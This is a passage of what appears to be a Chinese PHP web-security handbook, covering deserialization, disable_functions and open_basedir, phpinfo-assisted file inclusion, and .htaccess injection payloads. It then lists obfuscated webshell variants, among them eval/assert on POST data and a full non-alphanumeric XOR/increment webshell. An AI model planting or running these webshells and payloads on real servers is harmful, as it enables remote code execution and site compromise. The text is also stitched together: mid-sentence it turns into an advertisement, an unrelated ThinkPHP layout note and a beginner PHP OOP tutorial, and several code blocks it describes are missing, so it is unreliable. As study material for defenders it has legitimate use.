booleanb:<value>;b:1; // trueb:0; // falseintegeri:<value>;doubled:<value>;NULLN;strings:<length>:"<value>";s:1:"s";arraya:<length>:{key, value};a:1:{s:4:"key1";s:6:"value1";} // array("key1" => "value1");objectO:<class_name_length>:"<class_name><number_of_properties>:{<properties>};reference指针类型R:reference;O:1:"A":2:{s:1:"a";i:1;s:1:"b";R:2;}$a = new A();$a->a=1;$a->b=&$a->a;4.1.2.2. PHP反序列化漏洞

php在反序列化的时候会调用 __wakeup / __sleep 等函数，可能会造成代码执行等问题。若没有相关函数，在析构时也会调用相关的析构函数，同样会造成代码执行。

另外 __toString / __call 两个函数也有利用的可能。

其中 __wakeup 在反序列化时被触发，__destruct 在GC时被触发， __toString 在echo时被触发, __call 在一个未被定义的函数调用时被触发。

下面提供一个简单的demo.

利用 auto_prepend_file 和 include_path

输出

construct

Data's value is raw value.

destruct

string(44) "O:4:"Demo":1:{s:4:"data";s:9:"raw value";}"

把序列化的字符串修改一下后，执行

unserialize('O:4:"Demo":1:{s:4:"data";s:15:"malicious value";}');

输出

wake up

Data's value is malicious value.

destruct

这里看到，值被修改了.

上面是一个 unserialize() 的简单应用，不难看出，如果 __wakeup() 或者 __desturct() 有敏感操作，比如读写文件、操作数据库，就可以通过函数实现文件读写或者数据读取的行为。

那么，在 __wakeup() 中加入判断是否可以阻止这个漏洞呢？在 __wakeup() 中我们加入一行代码

但其实还是可以绕过的，在 PHP5 < 5.6.25， PHP7 < 7.0.10 的版本都存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时，wakeup就会被绕过，于是使用下面的payload

unserialize('O:7:"HITCON":1:{s:4:"data";s:15:"malicious value";}');

输出

Data's value is malicious value.

destruct

这里wakeup被绕过，值依旧被修改了。

4.1.3. Disable Functions

4.1.3.1. 机制实现

PHP中Disable Function的实现是在php-src/Zend/Zend-API.c中。PHP在启动时，读取配置文件中禁止的函数，逐一根据禁止的函数名调用 zend_disable_function 来实现禁止的效果。

这个函数根据函数名在内置函数列表中找到对应的位置并修改掉，当前版本的代码如下：

和函数的实现方式类似，disable classes也是这样实现的

因为这个实现机制的原因，在PHP启动后通过 ini_set 来修改 disable_functions 或 disable_classes 是无效的。

4.1.3.2. Bypass

LD_PRELOAD绕过PHP OPcacheMail函数imap_open4.1.4. Open Basedir

4.1.4.1. 机制实现

PHP中Disable Function的实现是在php-src/main/fopen-wrappers.c中，实现方式是在调用文件等相关操作时调用函数根据路径来检查是否在basedir内，其中一部分实现代码如下：

PHPAPI int php_check_open_basedir_ex(const char *path, int warn)

{

/* Only check when open_basedir is available */

if (PG(open_basedir) && *PG(open_basedir)) {

char *pathbuf;

char *ptr;

char *end;

/* Check if the path is too long so we can give a more useful error

* message. */

if (strlen(path) > (MAXPATHLEN - 1)) {

php_error_docref(NULL, E_WARNING, "File name is longer than the maximum allowed path length on this platform (%d): %s", MAXPATHLEN, path);

errno = EINVAL;

return -1;

}

pathbuf = estrdup(PG(open_basedir))

ptr = pathbuf;

while (ptr && *ptr) {

end = strchr(ptr, DEFAULT_DIR_SEPARATOR);

if (end != NULL) {

*end = '\0';

end++;

}

if (php_check_specific_open_basedir(ptr, path) == 0) {

efree(pathbuf);

return 0;

}

ptr = end;

}

if (warn) {

php_error_docref(NULL, E_WARNING, "open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)", path, PG(open_basedir));

}

efree(pathbuf);

errno = EPERM; /* we deny permission to open it */

return -1;

}

/* Nothing to check... */

return 0;

}

4.1.5. phpinfo相关漏洞

4.1.5.1. Session.Save

PHP的Session默认handler为文件，存储在 php.ini 的 session.save_path 中，若有任意读写文件的权限，则可修改或读取session。从phpinfo中可获得session位置

4.1.5.2. Session.Upload

php.ini默认开启了 session.upload_progress.enabled ， 该选项会导致生成上传进度文件，其存储路径可以在phpinfo中获取。

那么可以构造特别的报文向服务器发送，在有LFI的情况下即可利用。

4.1.5.3. /tmp临时文件竞争

phpinfo中可以看到上传的临时文件的路径，从而实现LFI

4.1.6. htaccess injection payload

4.1.6.1. file inclusion

利用 auto_prepend_file 和 include_path

4.1.6.2. code execution

php_value auto_append_file .htaccess

#<?php phpinfo();

4.1.6.3. file inclusion

php_flag allow_url_include 1php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B#php_value auto_append_file /evil-code.txt4.1.6.4. code execution with UTF-7

php_flag zend.multibyte 1

php_value zend._encoding "UTF-7"

php_value auto_append_file .htaccess

#+ADw?php phpinfo()+ADs

4.1.6.5. Source code disclosure

php_flag engine 0

4.1.7. WebShell

4.1.7.1. 常见变形

GLOBALSeval($GLOBALS['_POST']['op']);$_FILEeval($_FILE['name']);拆分assert(${"_PO"."ST"} ['sz']);动态函数执行$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);create_function$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();preg_replacerot13进制转化"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"利用文件名__FILE__4.1.7.2. 字符串变形函数

ucwordsucfirsttrimsubstr_replacesubstrstrtrstrtoupperstrtolowerstrtokstr_rot134.1.7.3. 回调函数

call_user_func_arraycall_user_funcarray_filterarray_walkarray_mapregistregister_shutdown_functionregister_tick_functionfilter_varfilter_var_arrayuasortuksortarray_reducearray_walkarray_walk_recursive4.1.7.4. 特殊字符Shell

PHP的字符串可以在进行异或、自增运算的时候，会直接进行运算，故可以使用特殊字符来构成Shell。

@$_++;

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");

@${$__}[!$_](${$__}[$_]);

$_=[];

$_=@"$_"; // $_='Array';

$_=$_['!'=='@']; // $_=$_[0];

$___=$_; // A

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

$___.=$__; // S

$___.=$__; // S

$__=$_;

$__++;$__++;$__++;$__++; // E

$___.=$__;

$__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R

$___.=$__;

$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$___.=$__;

$____='_';

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P

$____.=$__;

$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$____.=$__;

$_=$$____;

$___(_decode($_[_]));

4.1.8. 其它

4.1.8.1. 低精度

php中并不是用高精度来存储浮点数，而是用使用 IEEE 754 双精度格式，造成在涉及到浮点数比较的时候可能会出现预期之外的错误。比如 php -r "var_dump(0.2+0.7==

0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。

4.1.8.2. 弱类型

如果使用 == 来判断相等，则会因为类型推断出现一些预料之外的行为，比如magic hash，指当两个md5值都是 0e[0-9]{30} 的时候，就会认为两个hash值相等。另外在判断字符串和数字的时候，PHP会自动做类型转换，那么 1=="1a.php" 的结果会是true

另外在判断一些hash时，如果传入的是数组，返回值会为 NULL, 因此在判断来自网络请求的数据的哈希值时需要先判断数据类型。

同样的， strcmp() ereg() strpos() 这些函数在处理数组的时候也会异常，返回NULL。

4.1.8.3. 命令执行

preg_replace 第一个参数是//e的时候，第二个参数会被当作命令执行

4.1.8.4. 截断

PHP字符存在截断行为，可以使用 ereg / %00 / iconv 等实现php字符截断的操作，从而触发漏洞。

4.1.8.5. 变量覆盖

当使用 extract / parse_str 等函数时，或者使用php的 $$ 特性时，如果没有正确的调用，则可能使得用户可以任意修改变量。

4.1.8.6. 执行系统命令

禁用的函数可以在phpinfo中的 disable_functions 中查看

pcntl_execexecpassthrupopenshell_execsystemproc_open4.1.8.7. Magic函数

__construct() __destruct()__call() __callStatic()__get() __set()__isset() __unset()__sleep() __wakeup()__toString()__invoke()__set_state()__clone()__debugInfo()4.1.8.8. 文件相关敏感函数

move_uploaded_filefile_put_contents / file_get_contentsunlinkfopen / fgets4.1.8.9. php特性

php自身在解析请求的时候，如果参数名字中包含” “、”.”、”[“这几个字符，会将他们转换成下划线,讲了那么多渗透测试中PHP后门的安全检测方法,那么如果对此有需求的朋友可以咨询专业的网站安全公司来做渗透测试,国内做的比较好的安全公司如Sinesafe,启明星辰,绿盟等等。

thinkPHP下载后包含的目录如下：

其中project 应用部署目录为应用的根目录，（可设置）项目的名称可以自己修改，但是修改后需要在系统配置的参数中做对应的修改，位置是thinkphp\convention.php这个文件，这里不做详细说明，如果想了解，请继续关注我之后的文章。

public WEB部署目录（对外访问目录），public目录下的index.php应用入口文件是网站唯一的入口，所有内容的访问都是通过这个文件来实现的。实际调用的程序文件在application下，访问网站时如果不带任何路径，默认就是访问到 application下的index模块。

在使用thinkPHP框架的时候，大多不需要更改其他文件夹下的内容，主要编写的内容都在application下，可以在此文件夹下增加新的模块，并在controller 下增加控制类，在view下增加输出的模板。

PHP面向对象

前言

学习PHP的小朋友们都知道，PHP在中小型企业的应用是非常广泛包括建站、小程序、CRM与OA等，那么作为基础中的基础，PHP面向对象你又掌握了多少呢？在这将就这个问题做一个详细的讲解。

正文

一、定义类 使用关键字class定义

二、实例化对象 使用关键字new实例化对象

三、类成员的添加和访问　　（1）类成员：属性、方法、常量　　（2）添加成员需要使用修饰符 public、protected、private　　（3）修饰符的作用范围　　public 类内类外子类　　protected 类内子类　　private 类内　　（4）添加方法：如果方法前不带修饰符，默认带public；　　（5）添加常量：const 常量名；　　访问常量：类名：:常量名；　　::范围解析操作符

四、类内部对象$this和内存原理

$this是一个对象，指向实例化对象。当我们new实例化的时候，系统会给这个对象分配一个内存空间，内存空间分为栈内存和堆内存，将变量存在栈里，代码块存在堆里，然后堆的内存地址指向栈里的变量，如果再给栈中的变量赋值引用数据类型，内存地址就会被改变。

五、如果$a和$p指向同一个内存地址，它们是同一个对象，则改变一个则两个都会变

需要用克隆解决这个问题 关键字clone；通过clone来复制一个一模一样的对象，这样它们就不是同一个对象了；

六、构造函数和析构函数

（1）构造函数：我们在声明类的时候就存在这个函数，用new实例化时，函数自动调用。public function __construct(){};（2）析构函数：用于释放new实例化的内存空间，如果不销毁，会增加系统性能负荷；new实例化时，系统会自动调用；销毁原则：先人后出。

七、静态成员

静态成员的添加：在成员属性或方法前加关键字 static；　　静态成员的访问： 内部使用：self::$变量；或 类名：:$变量；　　外部使用： 类名：:$变量；

八、面向对象的三大特征

（1）封装：对外只提供可操作的方法，不会告诉你内部结构；（2）继承 子类可以继承父类的属性和方法，但是是有限继承，public、protected、private三个修饰的属性都可以继承，public、protected两个修饰的方法可以继承，父类的常量可以继承；（3）多态：php没有多态。重载：当子类跟父类有个相同的方法时，子类的方法会覆盖父类的方法。

九、关键字：parent

在继承中的子类有parent，可以访问父类的常量、方法、父类的静态属性，属性成员不能访问；访问方式： parent::$静态属性、fn()、常量。

十、final 不可重载的

（1）写在类前面 不许类被继承；（2）写在方法和属性前 子类不能重载父类的方法。

十一、抽象类 abstract

（1）抽象类不能被实例化；（2）如果一个类里面有一个方法被声明为抽象类，这个类就得申明抽象类；（3）只要这个方法被声明为抽象方法了，就不能写函数体，将函数后面的{}去掉，函数体由子类实现；（4）在继承一个抽象类的时候，子类必须定义父类。

结尾

通过本文的讲解各位对于PHP面向对象是不是有了一个基本的了解，想要熟练掌握还需要你们平时多下苦工与多多的联系。